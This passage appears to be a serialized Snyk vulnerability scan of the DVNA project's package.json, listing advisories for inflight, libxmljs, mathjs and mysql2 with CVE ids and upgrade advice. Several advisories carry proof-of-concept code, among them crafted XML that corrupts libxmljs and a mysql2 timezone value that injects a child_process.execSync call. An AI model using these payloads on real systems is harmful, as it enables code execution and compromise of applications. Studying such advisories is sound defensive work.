callback);\r\n }\r\n\r\n setImmediate(scheduleNext);\r\n }\r\n\r\n\r\n if (i % 100 === 0) {\r\n console.log(process.memoryUsage());\r\n }\r\n\r\n scheduleNext();\r\n}\r\n\r\ntestInflight();\r\n```\n# Remediation\nThere is no fixed version for `inflight`.\n\n# References\n- [GitHub Issue](https://github.com/isaacs/inflight/issues/5)\n- [GitHub PR](https://github.com/logdna/logdna-agent/pull/157)\n"},"properties":{"cvssv3_baseScore":6.2,"security-severity":"6.2","tags":["security","CWE-772","npm"]}} + Message: This file introduces a vulnerable inflight package with a medium severity vulnerability.Bunknownð +package.json:1-1SNYK-JS-LIBXMLJS-6091649VThis file introduces a vulnerable libxmljs package with a high severity vulnerability. :Þ MatchedRule: {"id":"SNYK-JS-LIBXMLJS-6091649","shortDescription":{"text":"High severity - Remote Code Execution (RCE) vulnerability in libxmljs"},"fullDescription":{"text":"(CVE-2024-34391) libxmljs@0.19.10"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: libxmljs\n* Introduced through: dvna@0.0.1 and libxmljs@0.19.10\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › libxmljs@0.19.10\n# Overview\n[libxmljs](https://github.com/libxmljs/libxmljs) is a libxml bindings for v8 javascript engine\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when parsing a specially crafted XML while invoking a function on the result of `attrs()` that was called on a parsed node. An attacker can cause denial of service, data leak, infinite loop, and execute arbitrary code on 32-bit systems with the `XML_PARSE_HUGE` flag enabled by submitting a malicious XML document.\n# PoC\n```js\r\n\r\nconst libxmljs = require('libxmljs');\r\n\r\nvar d = `\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\r\n\u003c!DOCTYPE note\r\n[\r\n\u003c!ENTITY writer \"` +\r\n 'A'.repeat(0x1234) +\r\n`\"\u003e\r\n]\u003e\r\n\u003cfrom\u003e\u0026writer;\u003c/from\u003e\r\n`;\r\n\r\nt = libxmljs.parseXml(d, {flags: [libxmljs.XMLParseFlags.XML_PARSE_HUGE]})\r\nfrom = t.get('//from')\r\nc = from.childNodes()[0]\r\nc2 = c.childNodes()[0]\r\nc2_attrs = c2.attrs()\r\n```\n# Remediation\nThere is no fixed version for `libxmljs`.\n\n# References\n- [GitHub Issue](https://github.com/libxmljs/libxmljs/issues/645)\n"},"properties":{"cvssv3_baseScore":8.1,"security-severity":"8.1","tags":["security","CWE-94","npm"]}} + Message: This file introduces a vulnerable libxmljs package with a high severity vulnerability.Bunknownì +package.json:1-1SNYK-JS-LIBXMLJS-6807576VThis file introduces a vulnerable libxmljs package with a high severity vulnerability. :Ú MatchedRule: {"id":"SNYK-JS-LIBXMLJS-6807576","shortDescription":{"text":"High severity - Type Confusion vulnerability in libxmljs"},"fullDescription":{"text":"(CVE-2024-34392) libxmljs@0.19.10"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: libxmljs\n* Introduced through: dvna@0.0.1 and libxmljs@0.19.10\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › libxmljs@0.19.10\n# Overview\n[libxmljs](https://github.com/libxmljs/libxmljs) is a libxml bindings for v8 javascript engine\n\nAffected versions of this package are vulnerable to Type Confusion when parsing a specially crafted XML while invoking the namespaces() function, which invokes `_wrap__xmlNode_nsDef_get()` function on a grand-child of a node that refers to an entity. An attacker can cause a denial of service or execute arbitrary code by parsing a specially crafted XML document.\n# PoC\n```js\n\nconst libxmljs = require('libxmljs');\n\nvar d = `\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003c!DOCTYPE note\n[\n\u003c!ENTITY writer PUBLIC \"` + \"A\".repeat(8) + \"B\".repeat(8) + \"C\".repeat(8) + \"D\".repeat(8) + \"P\".repeat(8) + `\" \"JFrog Security\"\u003e\n]\u003e\n\u003cfrom\u003e\u0026writer;\u003c/from\u003e\n`;\n\nt = libxmljs.parseXml(d)\nfrom = t.get('//from')\nc = from.childNodes()[0]\nc2 = c.childNodes()[0] //entity_decl\nn = c2.namespaces(true) //onlyLocal = true\n```\n# Remediation\nThere is no fixed version for `libxmljs`.\n\n# References\n- [GitHub Issue](https://github.com/libxmljs/libxmljs/issues/646)\n"},"properties":{"cvssv3_baseScore":8.1,"security-severity":"8.1","tags":["security","CWE-843","npm"]}} + Message: This file introduces a vulnerable libxmljs package with a high severity vulnerability.Bunknown…2 +package.json:1-1SNYK-JS-MATHJS-1016401TThis file introduces a vulnerable mathjs package with a high severity vulnerability. :÷0MatchedRule: {"id":"SNYK-JS-MATHJS-1016401","shortDescription":{"text":"High severity - Prototype Pollution vulnerability in mathjs"},"fullDescription":{"text":"(CVE-2020-7743) mathjs@3.10.1"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: mathjs\n* Introduced through: dvna@0.0.1 and mathjs@3.10.1\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mathjs@3.10.1\n# Overview\n[mathjs](https://github.com/josdejong/mathjs) is a math library for JavaScript and Node.js. It features a flexible expression parser with support for symbolic computation, comes with a large set of built-in functions and constants, and offers an integrated solution to work with diff.\n\nAffected versions of this package are vulnerable to Prototype Pollution via the `deepExtend function` that runs upon configuration updates.\n\n# Details\n\nPrototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as `__proto__`, `constructor` and `prototype`. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the `Object.prototype` are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.\n\nThere are two main ways in which the pollution of prototypes occurs:\n\n- Unsafe `Object` recursive merge\n \n- Property definition by path\n \n\n## Unsafe Object recursive merge\n\nThe logic of a vulnerable recursive merge function follows the following high-level model:\n```\nmerge (target, source)\n\n foreach property of source\n\n if property exists and is an object on both the target and the source\n\n merge(target[property], source[property])\n\n else\n\n target[property] = source[property]\n```\n\u003cbr\u003e \n\nWhen the source object contains a property named `__proto__` defined with `Object.defineProperty()` , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of `Object` and the source of `Object` as defined by the attacker. Properties are then copied on the `Object` prototype.\n\nClone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: `merge({},source)`.\n\n`lodash` and `Hoek` are examples of libraries susceptible to recursive merge attacks.\n\n## Property definition by path\n\nThere are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: `theFunction(object, path, value)`\n\nIf the attacker can control the value of “pathâ€, they can set this value to `__proto__.myValue`. `myValue` is then assigned to the prototype of the class of the object.\n\n# Types of attacks\n\nThere are a few methods by which Prototype Pollution can be manipulated:\n\n| Type |Origin |Short description |\n|--|--|--|\n| **Denial of service (DoS)**|Client |This is the most likely attack. \u003cbr\u003eDoS occurs when `Object` holds generic functions that are implicitly called for various operations (for example, `toString` and `valueOf`). \u003cbr\u003e The attacker pollutes `Object.prototype.someattr` and alters its state to an unexpected value such as `Int` or `Object`. In this case, the code fails and is likely to cause a denial of service. \u003cbr\u003e**For example:** if an attacker pollutes `Object.prototype.toString` by defining it as an integer, if the codebase at any point was reliant on `someobject.toString()` it would fail. |\n |**Remote Code Execution**|Client|Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.\u003cbr\u003e**For example:** `eval(someobject.someattr)`. In this case, if the attacker pollutes `Object.prototype.someattr` they are likely to be able to leverage this in order to execute code.|\n|**Property Injection**|Client|The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.\u003cbr\u003e **For example:** if a codebase checks privileges for `someuser.isAdmin`, then when the attacker pollutes `Object.prototype.isAdmin` and sets it to equal `true`, they can then achieve admin privileges.|\n\n# Affected environments\n\nThe following environments are susceptible to a Prototype Pollution attack:\n\n- Application server\n \n- Web server\n\n- Web browser\n \n\n# How to prevent\n\n1. Freeze the prototype— use `Object.freeze (Object.prototype)`.\n \n2. Require schema validation of JSON input.\n \n3. Avoid using unsafe recursive merge functions.\n \n4. Consider using objects without prototypes (for example, `Object.create(null)`), breaking the prototype chain and preventing pollution.\n \n5. As a best practice use `Map` instead of `Object`.\n\n## For more information on this vulnerability type:\n\n[Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.†GitHub, 26 May 2018](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)\n\n# Remediation\nUpgrade `mathjs` to version 7.5.1 or higher.\n# References\n- [GitHub Additional Information](https://github.com/josdejong/mathjs/blob/develop/src/utils/object.js#L82)\n- [GitHub Commit](https://github.com/josdejong/mathjs/commit/ecb80514e80bce4e6ec7e71db8ff79954f07c57e)\n"},"properties":{"cvssv3_baseScore":7.3,"security-severity":"7.3","tags":["security","CWE-1321","npm"]}} + Message: This file introduces a vulnerable mathjs package with a high severity vulnerability.BunknownÒ + +package.json:1-1npm:mathjs:20170331TThis file introduces a vulnerable mathjs package with a high severity vulnerability. :Ç MatchedRule: {"id":"npm:mathjs:20170331","shortDescription":{"text":"High severity - Arbitrary Code Execution vulnerability in mathjs"},"fullDescription":{"text":"mathjs@3.10.1"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: mathjs\n* Introduced through: dvna@0.0.1 and mathjs@3.10.1\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mathjs@3.10.1\n# Overview\n[`mathjs`](https://www.npmjs.com/package/mathjs) is an extensive math library for JavaScript and Node.js.\n\nAffected versions of the package are vulnerable to Arbitrary Code Execution.\n\nThe expression parser in mathjs uses the `eval` and the `new Function` methods insecurely which could allow an attacker to execute arbitrary code on the remote server.\n\n# Remediation\nUpgrade `mathjs` to version 3.10.3 or higher.\n\n# References\n- [GitHub Commit](https://github.com/josdejong/mathjs/compare/v3.10.1...v3.10.3)\n- [GitHub Changelog](https://github.com/josdejong/mathjs/blob/v3.11.5/HISTORY.md#2017-03-31-version-3103)"},"properties":{"cvssv3_baseScore":7.3,"security-severity":"7.3","tags":["security","CWE-94","npm"]}} + Message: This file introduces a vulnerable mathjs package with a high severity vulnerability.BunknownÆ +package.json:1-1npm:mathjs:20170402VThis file introduces a vulnerable mathjs package with a medium severity vulnerability. :¹ MatchedRule: {"id":"npm:mathjs:20170402","shortDescription":{"text":"Medium severity - Arbitrary Code Execution vulnerability in mathjs"},"fullDescription":{"text":"mathjs@3.10.1"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: mathjs\n* Introduced through: dvna@0.0.1 and mathjs@3.10.1\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mathjs@3.10.1\n# Overview\n[`mathjs`](https://www.npmjs.com/package/mathjs) is an extensive math library for JavaScript and Node.js.\n\nAffected versions of the package are vulnerable to Arbitrary Code Execution.\n\nThe expression parser in mathjs uses the `eval` and the `new Function` methods insecurely which could allow an attacker to execute arbitrary code on the remote server.\n\nthis is due to an incomplete fix for [npm:mathjs:20170331](https://snyk.io/vuln/npm:mathjs:20170331).\n\n# Remediation\nUpgrade `mathjs` to version 3.11.5 or higher.\n\n# References\n- [GitHub PR #1](https://github.com/josdejong/mathjs/issues/821)\n- [GitHub PR #2](https://github.com/josdejong/mathjs/issues/822)\n- [GitHub Changelog](https://github.com/josdejong/mathjs/blob/master/HISTORY.md#2017-04-08-version-3115)\n- [GitHub Commit](https://github.com/josdejong/mathjs/compare/v3.10.3...v3.11.5)\n"},"properties":{"cvssv3_baseScore":5.6,"security-severity":"5.6","tags":["security","CWE-94","npm"]}} + Message: This file introduces a vulnerable mathjs package with a medium severity vulnerability.BunknownÌ + +package.json:1-1npm:mathjs:20170527VThis file introduces a vulnerable mathjs package with a medium severity vulnerability. :¿ MatchedRule: {"id":"npm:mathjs:20170527","shortDescription":{"text":"Medium severity - Arbitrary Code Execution vulnerability in mathjs"},"fullDescription":{"text":"mathjs@3.10.1"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: mathjs\n* Introduced through: dvna@0.0.1 and mathjs@3.10.1\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mathjs@3.10.1\n# Overview\n[`mathjs`](https://www.npmjs.com/package/mathjs) is an extensive math library for JavaScript and Node.js.\n\nAffected versions of the package are vulnerable to Arbitrary Code Execution. The `isSafeMethod` was able to call other methods (like bind) which is not allowed and could cause code execution on the remote server.\n\n# Remediation\nUpgrade `mathjs` to version 3.13.3 or higher.\n\n# References\n- [GitHub Changelog](https://github.com/josdejong/mathjs/blob/master/HISTORY.md#2017-05-27-version-3133)\n- [GitHub Commit](https://github.com/josdejong/mathjs/commit/ed5f2cebaf873ba1e57acbce2a3668686ac69331)\n"},"properties":{"cvssv3_baseScore":5.6,"security-severity":"5.6","tags":["security","CWE-94","npm"]}} + Message: This file introduces a vulnerable mathjs package with a medium severity vulnerability.Bunknownö + +package.json:1-1npm:mathjs:20171118TThis file introduces a vulnerable mathjs package with a high severity vulnerability. :ë MatchedRule: {"id":"npm:mathjs:20171118","shortDescription":{"text":"High severity - Arbitrary Code Execution vulnerability in mathjs"},"fullDescription":{"text":"(CVE-2017-1001002) mathjs@3.10.1"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: mathjs\n* Introduced through: dvna@0.0.1 and mathjs@3.10.1\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mathjs@3.10.1\n# Overview\n[`mathjs`](https://www.npmjs.com/package/mathjs) is an extensive math library for JavaScript and Node.js\n\nAffected versions of the package are vulnerable to Arbitrary Code Execution via `typed-function`. A malicious user could possibly execute arbitrary code in the JavaScript engine, by creating a typed function with JavaScript code in the name.\n\n# Remediation\nUpgrade `mathjs` to version 3.17.0 or higher.\n\n# References\n- [GitHub Changelog](https://github.com/josdejong/mathjs/blob/master/HISTORY.md#2017-11-18-version-3170)\n- [GitHub Commit](https://github.com/josdejong/mathjs/commit/8d2d48d81b3c233fb64eb2ec1d7a9e1cf6a55a90)\n"},"properties":{"cvssv3_baseScore":7.3,"security-severity":"7.3","tags":["security","CWE-94","npm"]}} + Message: This file introduces a vulnerable mathjs package with a high severity vulnerability.BunknownÍ + +package.json:1-1npm:mathjs:20171118-1XThis file introduces a vulnerable mathjs package with a critical severity vulnerability. :¼ MatchedRule: {"id":"npm:mathjs:20171118-1","shortDescription":{"text":"Critical severity - Arbitrary Code Execution vulnerability in mathjs"},"fullDescription":{"text":"(CVE-2017-1001003) mathjs@3.10.1"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: mathjs\n* Introduced through: dvna@0.0.1 and mathjs@3.10.1\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mathjs@3.10.1\n# Overview\n[`mathjs`](https://www.npmjs.com/package/mathjs) is an extensive math library for JavaScript and Node.js\n\nAffected versions of the package are vulnerable to Arbitrary Code Execution. Forbidden properties like constructor could be replaced by using unicode characters when creating an object.\n\n# Remediation\nUpgrade `mathjs` to version 3.17.0 or higher.\n\n# References\n- [GitHub Changelog](https://github.com/josdejong/mathjs/blob/master/HISTORY.md#2017-11-18-version-3170)\n- [GitHub Commit](https://github.com/josdejong/mathjs/commit/a60f3c8d9dd714244aed7a5569c3dccaa3a4e761)\n"},"properties":{"cvssv3_baseScore":9.8,"security-severity":"9.8","tags":["security","CWE-94","npm"]}} + Message: This file introduces a vulnerable mathjs package with a critical severity vulnerability.BunknownÆ5 +package.json:1-1SNYK-JS-MYSQL2-6591084VThis file introduces a vulnerable mysql2 package with a medium severity vulnerability. :¶4MatchedRule: {"id":"SNYK-JS-MYSQL2-6591084","shortDescription":{"text":"Medium severity - Prototype Poisoning vulnerability in mysql2"},"fullDescription":{"text":"(CVE-2024-21509) mysql2@1.7.0"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: mysql2\n* Introduced through: dvna@0.0.1 and mysql2@1.7.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mysql2@1.7.0\n# Overview\n[mysql2](https://www.npmjs.com/package/mysql2) is a mostly API compatible with mysqljs and supports majority of features.\n\nAffected versions of this package are vulnerable to Prototype Poisoning due to insecure `results` object creation and improper user input sanitization passed through `parserFn` in `text_parser.js` and `binary_parser.js`.\n# PoC\n```sql\r\nSELECT CAST('{\"toString\": {\"toString\":true}, \"tags\": {\"a\": 1, \"b\": null}}' as JSON) AS __proto__;\r\n```\r\n\r\n```js\r\nObject.getPrototypeOf(results[0])\r\n\u003e { tags: { a: 1, b: null }, toString: { toString: true } }\r\n```\n\n# Details\n\nPrototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as `__proto__`, `constructor` and `prototype`. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the `Object.prototype` are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.\n\nThere are two main ways in which the pollution of prototypes occurs:\n\n- Unsafe `Object` recursive merge\n \n- Property definition by path\n \n\n## Unsafe Object recursive merge\n\nThe logic of a vulnerable recursive merge function follows the following high-level model:\n```\nmerge (target, source)\n\n foreach property of source\n\n if property exists and is an object on both the target and the source\n\n merge(target[property], source[property])\n\n else\n\n target[property] = source[property]\n```\n\u003cbr\u003e \n\nWhen the source object contains a property named `__proto__` defined with `Object.defineProperty()` , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of `Object` and the source of `Object` as defined by the attacker. Properties are then copied on the `Object` prototype.\n\nClone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: `merge({},source)`.\n\n`lodash` and `Hoek` are examples of libraries susceptible to recursive merge attacks.\n\n## Property definition by path\n\nThere are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: `theFunction(object, path, value)`\n\nIf the attacker can control the value of “pathâ€, they can set this value to `__proto__.myValue`. `myValue` is then assigned to the prototype of the class of the object.\n\n# Types of attacks\n\nThere are a few methods by which Prototype Pollution can be manipulated:\n\n| Type |Origin |Short description |\n|--|--|--|\n| **Denial of service (DoS)**|Client |This is the most likely attack. \u003cbr\u003eDoS occurs when `Object` holds generic functions that are implicitly called for various operations (for example, `toString` and `valueOf`). \u003cbr\u003e The attacker pollutes `Object.prototype.someattr` and alters its state to an unexpected value such as `Int` or `Object`. In this case, the code fails and is likely to cause a denial of service. \u003cbr\u003e**For example:** if an attacker pollutes `Object.prototype.toString` by defining it as an integer, if the codebase at any point was reliant on `someobject.toString()` it would fail. |\n |**Remote Code Execution**|Client|Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.\u003cbr\u003e**For example:** `eval(someobject.someattr)`. In this case, if the attacker pollutes `Object.prototype.someattr` they are likely to be able to leverage this in order to execute code.|\n|**Property Injection**|Client|The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.\u003cbr\u003e **For example:** if a codebase checks privileges for `someuser.isAdmin`, then when the attacker pollutes `Object.prototype.isAdmin` and sets it to equal `true`, they can then achieve admin privileges.|\n\n# Affected environments\n\nThe following environments are susceptible to a Prototype Pollution attack:\n\n- Application server\n \n- Web server\n\n- Web browser\n \n\n# How to prevent\n\n1. Freeze the prototype— use `Object.freeze (Object.prototype)`.\n \n2. Require schema validation of JSON input.\n \n3. Avoid using unsafe recursive merge functions.\n \n4. Consider using objects without prototypes (for example, `Object.create(null)`), breaking the prototype chain and preventing pollution.\n \n5. As a best practice use `Map` instead of `Object`.\n\n## For more information on this vulnerability type:\n\n[Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.†GitHub, 26 May 2018](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)\n\n# Remediation\nUpgrade `mysql2` to version 3.9.4 or higher.\n# References\n- [GitHub Commit](https://github.com/sidorares/node-mysql2/commit/4a964a3910a4b8de008696c554ab1b492e9b4691)\n- [GitHub PR](https://github.com/sidorares/node-mysql2/pull/2574)\n- [GitHub Release](https://github.com/sidorares/node-mysql2/releases/tag/v3.9.4)\n- [Security Blog](https://blog.slonser.info/posts/mysql2-attacker-configuration/)\n- [Vulnerable Code](https://github.com/sidorares/node-mysql2/blob/fd3d117da82cc5c5fa5a3701d7b33ca77691bc61/lib/parsers/text_parser.js#L134)\n"},"properties":{"cvssv3_baseScore":6.5,"security-severity":"6.5","tags":["security","CWE-1321","npm"]}} + Message: This file introduces a vulnerable mysql2 package with a medium severity vulnerability.Bunknown +package.json:1-1SNYK-JS-MYSQL2-6591085XThis file introduces a vulnerable mysql2 package with a critical severity vulnerability. :ï MatchedRule: {"id":"SNYK-JS-MYSQL2-6591085","shortDescription":{"text":"Critical severity - Remote Code Execution (RCE) vulnerability in mysql2"},"fullDescription":{"text":"(CVE-2024-21508) mysql2@1.7.0"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: mysql2\n* Introduced through: dvna@0.0.1 and mysql2@1.7.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mysql2@1.7.0\n# Overview\n[mysql2](https://www.npmjs.com/package/mysql2) is a mostly API compatible with mysqljs and supports majority of features.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) via the `readCodeFor` function due to improper validation of the `supportBigNumbers` and `bigNumberStrings` values.\n# PoC\n```js\r\n {sql:`SELECT INDEX_LENGTH FROM information_schema.tables LIMIT 1`, supportBigNumbers:\"console.log(1337)\"}\r\n```\n# Remediation\nUpgrade `mysql2` to version 3.9.4 or higher.\n# References\n- [GitHub Commit](https://github.com/sidorares/node-mysql2/commit/74abf9ef94d76114d9a09415e28b496522a94805)\n- [GitHub PR](https://github.com/sidorares/node-mysql2/pull/2572)\n- [GitHub Release](https://github.com/sidorares/node-mysql2/releases/tag/v3.9.4)\n- [Security Blog](https://blog.slonser.info/posts/mysql2-attacker-configuration/)\n- [Vulnerable Code](https://github.com/sidorares/node-mysql2/blob/1609b5393516d72a4ae47196837317fbe75e0c13/lib/parsers/text_parser.js#L14C10-L14C21)\n"},"properties":{"cvssv3_baseScore":9.8,"security-severity":"9.8","tags":["security","CWE-94","npm"]}} + Message: This file introduces a vulnerable mysql2 package with a critical severity vulnerability.BunknownÅ +package.json:1-1SNYK-JS-MYSQL2-6591300VThis file introduces a vulnerable mysql2 package with a medium severity vulnerability. :µMatchedRule: {"id":"SNYK-JS-MYSQL2-6591300","shortDescription":{"text":"Medium severity - Use of Web Browser Cache Containing Sensitive Information vulnerability in mysql2"},"fullDescription":{"text":"(CVE-2024-21507) mysql2@1.7.0"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: mysql2\n* Introduced through: dvna@0.0.1 and mysql2@1.7.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mysql2@1.7.0\n# Overview\n[mysql2](https://www.npmjs.com/package/mysql2) is a mostly API compatible with mysqljs and supports majority of features.\n\nAffected versions of this package are vulnerable to Use of Web Browser Cache Containing Sensitive Information through the `keyFromFields` function, resulting in cache poisoning. An attacker can inject a colon (`:`) character within a value of the attacker-crafted key.\n# PoC\n```js\r\n connection.query(\r\n 'SELECT information_schema.tables.TABLE_NAME,`tables:160:63/DATA_LENGTH:8:undefined::tables`.TABLE_ROWS FROM information_schema.tables INNER JOIN information_schema.tables AS `tables:160:63/DATA_LENGTH:8:undefined::tables` ON `tables:160:63/DATA_LENGTH:8:undefined::tables`.TABLE_ROWS!=information_schema.tables.TABLE_ROWS LIMIT 1;',\r\n function(err, results, fields) {\r\n }\r\n );\r\n // Send another request and spwan new connection\r\n connection1.query(\r\n `SELECT TABLE_NAME, TABLE_ROWS, DATA_LENGTH FROM information_schema.tables LIMIT 1;`,\r\n function(err, results, fields) {\r\n console.log(results);\r\n console.log(fields);\r\n }\r\n );\r\n```\r\n\r\n\r\nResults\r\n\r\n```js\r\n[ { TABLE_NAME: 'ADMINISTRABLE_ROLE_AUTHORIZATIONS', TABLE_ROWS: 0 } ]\r\n[\r\n `TABLE_NAME` VARCHAR(64) NOT NULL,\r\n `TABLE_ROWS` BIGINT(21) UNSIGNED,\r\n `DATA_LENGTH` BIGINT(21) UNSIGNED\r\n]\r\n```\n# Remediation\nUpgrade `mysql2` to version 3.9.3 or higher.\n# References\n- [GitHub Commit](https://github.com/sidorares/node-mysql2/commit/0d54b0ca6498c823098426038162ef10df02c818)\n- [GitHub PR](https://github.com/sidorares/node-mysql2/pull/2424)\n- [Security Article](https://blog.slonser.info/posts/mysql2-attacker-configuration/)\n"},"properties":{"cvssv3_baseScore":6.5,"security-severity":"6.5","tags":["security","CWE-525","npm"]}} + Message: This file introduces a vulnerable mysql2 package with a medium severity vulnerability.Bunknownó +package.json:1-1SNYK-JS-MYSQL2-6670046XThis file introduces a vulnerable mysql2 package with a critical severity vulnerability. :áMatchedRule: {"id":"SNYK-JS-MYSQL2-6670046","shortDescription":{"text":"Critical severity - Arbitrary Code Injection vulnerability in mysql2"},"fullDescription":{"text":"(CVE-2024-21511) mysql2@1.7.0"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: mysql2\n* Introduced through: dvna@0.0.1 and mysql2@1.7.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mysql2@1.7.0\n# Overview\n[mysql2](https://www.npmjs.com/package/mysql2) is a mostly API compatible with mysqljs and supports majority of features.\n\nAffected versions of this package are vulnerable to Arbitrary Code Injection due to improper sanitization of the `timezone` parameter in the `readCodeFor` function by calling a native MySQL Server date/time function.\n# PoC\n```js\r\nconst mysql = require('mysql2');\r\nconst connection = mysql.createConnection({\r\n host: '127.0.0.1',\r\n user: 'root',\r\n database: 'test',\r\n password: '123456',\r\n});\r\n\r\nlet query_data = {\r\n sql: `SELECT CURDATE();`,\r\n timezone:\r\n \"');''.constructor.constructor('return process')().mainModule.require('child_process').execSync('open /System/Applications/Calculator.app');console.log('\",\r\n};\r\n\r\nconnection.query(query_data, (err, results) =\u003e {\r\n if (err) throw err;\r\n console.log(results);\r\n});\r\n\r\nconnection.end();\r\n```\n# Remediation\nUpgrade `mysql2` to version 3.9.7 or higher.\n# References\n- [GitHub Commit](https://github.com/sidorares/node-mysql2/commit/7d4b098c7e29d5a6cb9eac2633bfcc2f0f1db713)\n- [GitHub PR](https://github.com/sidorares/node-mysql2/pull/2608)\n- [GitHub Release](https://github.com/sidorares/node-mysql2/releases/tag/v3.9.7)\n"},"properties":{"cvssv3_baseScore":9.8,"security-severity":"9.8","tags":["security","CWE-94","npm"]}} + Message: This file introduces a vulnerable mysql2 package with a critical severity vulnerability.Bunknown³5 +package.json:1-1SNYK-JS-MYSQL2-6861580TThis file introduces a vulnerable mysql2 package with a high severity vulnerability. :¥4MatchedRule: {"id":"SNYK-JS-MYSQL2-6861580","shortDescription":{"text":"High severity - Prototype Pollution vulnerability in mysql2"},"fullDescription":{"text":"(CVE-2024-21512) mysql2@1.7.0"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: mysql2\n* Introduced through: dvna@0.0.1 and mysql2@1.7.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mysql2@1.7.0\n# Overview\n[mysql2](https://www.npmjs.com/package/mysql2) is a mostly API compatible with mysqljs and supports majority of features.\n\nAffected versions of this package are vulnerable to Prototype Pollution due to improper user input sanitization passed to fields and tables when using `nestTables`.\n# PoC\n```js\r\n\r\nconst mysql = require('mysql2');\r\nconst connection = mysql.createConnection({\r\nhost: '127.0.0.1',\r\nuser: 'root',\r\ndatabase: 'test',\r\npassword: 'root',\r\n});\r\n\r\nlet query_data = {\r\nsql: `SELECT CAST('{\"admin\":true}' AS JSON)_proto__;`,\r\nnestTables: \"_\",\r\n};\r\n\r\nconnection.query(query_data, (err, results) =\u003e {\r\n\r\nif (err) throw err;\r\nconsole.log(Object.getPrototypeOf(results[0]));\r\nconsole.log(results[0].admin);\r\n});\r\n\r\nconnection.end();\r\n\r\n\r\n```\n\n# Details\n\nPrototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as `__proto__`, `constructor` and `prototype`. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the `Object.prototype` are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.\n\nThere are two main ways in which the pollution of prototypes occurs:\n\n- Unsafe `Object` recursive merge\n \n- Property definition by path\n \n\n## Unsafe Object recursive merge\n\nThe logic of a vulnerable recursive merge function follows the following high-level model:\n```\nmerge (target, source)\n\n foreach property of source\n\n if property exists and is an object on both the target and the source\n\n merge(target[property], source[property])\n\n else\n\n target[property] = source[property]\n```\n\u003cbr\u003e \n\nWhen the source object contains a property named `__proto__` defined with `Object.defineProperty()` , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of `Object` and the source of `Object` as defined by the attacker. Properties are then copied on the `Object` prototype.\n\nClone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: `merge({},source)`.\n\n`lodash` and `Hoek` are examples of libraries susceptible to recursive merge attacks.\n\n## Property definition by path\n\nThere are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: `theFunction(object, path, value)`\n\nIf the 